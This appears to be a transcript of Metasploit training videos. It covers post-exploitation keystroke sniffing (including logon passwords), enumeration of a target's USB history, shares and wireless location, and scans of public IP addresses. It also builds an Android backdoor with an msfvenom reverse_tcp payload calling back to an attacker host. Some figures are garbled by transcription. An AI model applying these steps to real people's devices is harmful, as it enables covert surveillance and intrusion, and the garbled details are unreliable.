Type set payload Windows Meterpreter _TCP. Let's set old password as small s. Now let's change small s to capital S. Type set new password capital S. Set SMB user YT. Type show options. Here you can see that session is not set. Type session 19. Let's execute it. Here you can see that password change successful. That's it in this video. Thank you for watching this video. Welcome. In this video we will deal with some of the standard API user interface commands associated with desktops and keystroke sniffing. Capturing the keystroke depends on the current active desktop, so it is essential to understand how we can sniff different keystrokes by switching between processes running in different desktop active sessions. Let's move ahead with the practical to understand this deeply. Let us start with executing some of the user interface commands which we will primarily deal with in this Metasploit. Enum desktops. This command will list all the accessible desktop and Windows stations. Let's open up terminal. Here I have already opened Metasploit console. In previous video I explained how to create Metasploit sessions. So type enum desktops. Here you can see that all the available desktop stations are associated with session 1. We will see in a while what exactly we mean by session 1. Now let's type get desktop. The get desktop command returns the information of the current desktop in which our Metasploit session is working. Here you see that active session. The set desktop command is used to change current Metasploit desktop to another available desktop station. The keyscan_start command is used to start keystroke sniffer in the current active desktop station. The keyscan_dump command dumps the recorded keystrokes of the active Metasploit desktop session. Let us now analyze how these commands work in a real-time scenario and how we can sniff keystrokes through different desktop stations. There is an important concept about Windows desktop that we will look at. The Windows desktop is divided into different sessions in order to define the ways we can interact with the Windows machine. Session 0 represents the console. The other sessions, session 1, session 2 and so on, represent remote desktop session. So in order to capture the keystrokes of the system we broke into, we must work in desktop session 0. Every Windows desktop session is comprised of different stations. In the preceding diagram, you can see different stations associated with session 0. Out of these stations, WinSTA0 is the only interactive station. This means that the user can interact with only WinSTA0 station. All of the other stations are non-interactive. Now, WinSTA0 consists of 3 different desktops, namely default, disconnect, and WinLogon. The default desktop is associated with all the application and tasks that we perform on our desktop. The disconnect desktop is concerned with the screensaver log desktop. The WinLogon desktop is concerned with Windows login screen. The point to note here is that each desktop has its own keyboard buffer. So if you have to sniff the keystroke from the default desktop, you will have to make sure that your current Metasploit active browser is set to session 0, WinSTA0 or default. If you have to sniff the logon password, you will have to change the active desktop to session 0 or WinSTA0 WinLogon. So that's it in this video on get desktop and keystroke sniffing. Thank you for watching this video. Welcome. In this video we will learn USB history and enum shares Metasploit post-exploitation module in Metasploit. USB history. This module will enumerate USB drive history on the target host. Let's open up terminal. Here I have already opened Metasploit command prompt. Type run post windows gather USB history. You can see that USB history module running against target white PC. It will display all USB driver history, the coolpad USB driver, USB device and so on. Enum shares. This module will enumerate configured and recently used file shares on the target PC. Type run post/windows gather enum shares. Here you can see that target PC shared files and drives. Drive D and E are the shared drives. So that's it in this video on USB history and enum shares in Metasploit post-exploitation modules. Thank you for watching this video. Welcome. In this video, we are going to learn using the database to store the penetration testing result in Metasploit. Let us now learn how we can use our configure database to store our result of the penetration test. Now we are all set to use database for storing result. Enter the help command in MSF console to have a quick look at the important database commands available to us. Let us start with a quick example. Open up terminal and open Metasploit framework. Type db_nmap. You can see that basic usage of db_nmap, that is save, help, nmap option. The db_nmap command stores the result of the port scan directly into database along with all relevant information. Launch a simple nmap scan on the target machine to see how it works. Type db_nmap 210.58.199.142. You can see that all information is stored in database. Using these open ports, let's connect to open port using connect command. Type connect 216.58.199.142.443. In previous video, we learned connect command. You can see that it is connected to 216.58.199.142. So that's it in this video on using the database to store penetration testing result. Thank you for watching this video. Welcome. In this video, we are going to learn gather LAN information and geolocation of remote Windows, Linux or Mac. Enumerate wireless networks visible to target device. Optionally geolocate the target by gathering local wireless networks and performing a lookup against Google APIs. Let's open up terminal. Here I already created sessions. In previous video I have shown that how to get Meterpreter sessions. Type sessions. You can see that active sessions. Let's load LAN_geolocate into MSF console. Now type use post/multi gather/LAN_geolocate. Type info. Here you can see that model information. Type set payload Windows Meterpreter /reverse_TCP. Let's set session as 2. Type set session 2. Now execute it. You can see that wireless list will be stored on your local computer. Root /.msf4/loot directory path. You can see the final result output. We get interface name and all from victim PC. So that's it in this video on LAN information and geolocation of remote Windows in Metasploit. Thank you for watching this video. Welcome. In this video we are going to learn starting up Armitage. I'll be using Armitage on Linux as it is by default installed on it. Those who are running different OS can check site for downloading and installing Armitage according to your OS. The very first screen you will see will look like this, which is the part to start up Armitage. Let's click on Armitage. Once you click the connect option, you'll be greeted with this second window. Armitage is asking to connect itself with the Metasploit RPC server, which is not running as of now. Next, it will ask for connect to the default address, which will be 127.0.0.1 on the default port number 5553. Click on S. After the connection is established, the main Armitage window will come up. Here you can see the main Armitage window has three main panels. modules, targets, and tabs. We can click on the individual panels to resize them according to our needs. The different machines which we can see in the target panel are there because my old session are open here. But otherwise it will be blank. The module browser gives us the option to launch Metasploit auxiliary modules through an exploit, generate a payload, and run a post-exploitation module. By clicking on the individual modules, we can see the tree to launch desired module. Double-click a module to open a module launch dialog. Here you can see that target host. Click on View tab, Reporting, Activity Logs. Here you can see that console and Cortana log files. Using this Armitage graphical user interface tool, you can use it easily. It is user-friendly tool. So that's it in this video on starting up Armitage. Thank you for watching this video. Welcome. In this video we are going to learn discovery scan in Armitage. Metasploit have different modules for scanning and fingerprinting hosts which are very reliable and very accurate and gives accurate fingerprints when common services are available. Highlight one or more hosts and click scan to launch these modules, which works through a pivot. Let's open up Armitage. Here you can see that target host. Type on Armitage tag. You can view targets in graph or table view. We can see that table view. Go to host tag. Click on add host, hacking2.com host. Type 107.180.54.186. Here you can see that 107.180.54.186 host is added into targets. Right click on target 107.180.54.186 host. Select scan. Here you can see that scanning is started. The two TCP ports are open. So that's it in this video on discovery scan in Armitage. Thank you for watching this video. Welcome. In this video we are going to learn Nmap port scanning using Armitage tool in Metasploit. We do learn this Nmap port scanning in MSF console. Armitage is a graphical user interface tool for Metasploit. Let's open up Armitage. Go to host tab. Here you can see that Nmap scan. It scans intent scan and it also does intent scan plus UDP, all TCP ports, ping scan and so on. Let's scan for TCP all ports. Here you can see that input prompt dialog box. Type IP address scan range. Here I am typing hacking2.com IP address as 107.180.54.186. Here you can see that it will discover TCP ports, open ports 172.3.143.443 and so on. TCP on 107.180.54.186. Let's do intent scan with the ping option. Type 107.180.54.186. Here we can see that discovered open ports. Armitage is a graphical user interface tool, easy to exploit or scan. Select ping scan option. Type IP address as 107.180.54.186. Here you can see that our target PC is applicable for exploit. Now let's try with invalid IP address. Type 969.685.253.365. We can see that failed to resolve 969.685.253.365 invalid IP address. So that's it in this video on Nmap port scanning using Armitage. Thank you for watching this video. Welcome. In this video we are going to learn defining methods in Ruby. The first reason that Ruby was selected because it was a language that the Metasploit staff enjoyed writing in it. After spending time analyzing other languages and factoring in past experience, the Ruby programming language was found to offer both a simple and powerful approach to an interpreted language. The degree of introspection and the object-oriented aspect provided by the Ruby were something that fit very nicely with some of the requirements of the framework. The framework's need for automated class construction for code reuse was a key factor in the decision-making process, and it was one of the things that Perl was not very well suited to offer. On top of this, the syntax is incredibly simplistic and provides same level of language features that other more accepted languages have, like Perl. Ruby methods are very similar to functions in any other programming language. Ruby methods are used to bundle one or more repeatable statements into a single unit. Method names should begin with lowercase letter. If you begin a method name with an uppercase letter, Ruby might think that it is constant and hence can parse the call incorrectly. Methods should be defined before calling them, otherwise Ruby will raise an exception for undefined method invoking. Let's open up text editor, type print sample Ruby function. Here I am declaring one function. Every function in Ruby declared by def function and terminated by end function. Let's define simple fun. Type def sample underscore fun a parameter as a. Type print in the function body as Ruby is heart of plus a end. We call the function by function name. Type sample underscore fun Metasploit. Here I am passing Metasploit as parameter. Let's execute it. Sample function Ruby's heart of Metasploit. So that's it in this video on defining methods in Ruby. Thank you for watching this video. Welcome. In this video we are going to learn Ruby introduction and first program with Ruby. Ruby is powerful, flexible programming language you can use in web or internet development to process text, to create games, and as a part of the popular Ruby on Rails web framework. Ruby is high level, meaning reading and writing Ruby is really easy. It looks a lot like regular English. It is interpreted, meaning you don't need a compiler to write and run Ruby. You can write it on online platforms like Code Academy or some other, or even on your own computer. It's an object-oriented, meaning it allows user to manipulate data structure called objects in order to build and execute program. We'll learn more about objects later, but for now, all you need to know is everything in Ruby is an object. It's easy to use. Ruby was designed by Yukihiro Matsumoto in 1985. Matt set out to design a language that emphasized human needs over those of the computer, which is why Ruby is easy to pick up. Let's open up terminal. Type ruby space -h. Here you can see that basic usage of Ruby, basic options. Type leafpad sample.rb. Write one simple program. Type a equals to hello world. Here you can see that I am declaring variable as a. Let's print a. It will print hello world. Save it. Type sample.rb. You can see that hello world is printed. Let's modify sample.rb, declare variable p as I love Metasploit, print a plus b. Here plus operator will join both a and b string. Here you can see that hello world I love Metasploit is printed. So that's it in this video on Ruby introduction and first program with Ruby. Thank you for watching this video. Welcome. In this video we are going to learn how to detect meter session using antimeter. When you open this software, it will scan the whole computer and it shows the virus containing file. Also, it will ask you to kill the process or not. So if you type Y for S and the process will die. Let's download it using this link, that is www.mertsariga.com/codes/antimeter2.zip. Extract it. Here it will scan the whole computer and it shows the virus containing file. Also it will ask you to kill the process or not. So if you type Y for S and the process will die. Here you can see that Linux meter sessions are opened here. Let's execute it, antimeter exe file. So in this way you can detect if you have been hacked. This tool does not only allow us to detect the file but helps us to kill it also, that in 2 simple steps. When the steps are completed, your hacker will lose the session, making you safe and secure. So now you can be sure about your protection against meter sessions. That's it in this video on how to detect meter session using antimeter. Thank you for watching this video. Welcome. In this video we will see how we can protect our Android device. In 2015, mobile security firm Zimperian declared it has discovered a high severity vulnerability inside the Android operating system. Now let's see how Android backdoor is installed and its operation. Here you can see that in terminal I have created Android backdoor using msfvenom. msfvenom space -p is payload option. Payload as Android/meter/reverse_tcp lhost attacker IP address 192.168.1.104 attacker port address L port equals to 444 r hack.apk. Using the command our backdoor is created. Let's install it in the victim mobile. You can see that in mobile I have copied the backdoor file. Let's install the backdoor file. Double click on it, click on install. You can see that our backdoor file operations. Modify system setting, like attacker can change your system settings, passwords, etc. Attacker can take a picture and video when we want. Attacker can modify your contact. He can read, write or delete any file. He can also find your appropriate location. Attacker can record audio. He can call any number directly without your permission. He can send, read, write or delete messages, and so on. Backdoor is installed in the victim mobile. If you want to prevent all this attack, try to download APK files from Google Play Store and do have latest Android operating system, because Google usually patch the bug in the latest release of Android OS. But the problem is a large number of Android users have an older version of Android. So it is up to the device manufacturers, that is hardware partners like Samsung, Xiaomi, etc. to safeguard the device against vulnerabilities. Practically, it takes lots of time for manufacturers to release patches. Here are the list of things user can do to reduce their risk exposure to vulnerability. That's it in this video on how we can protect our Android device. Thank you for watching this video.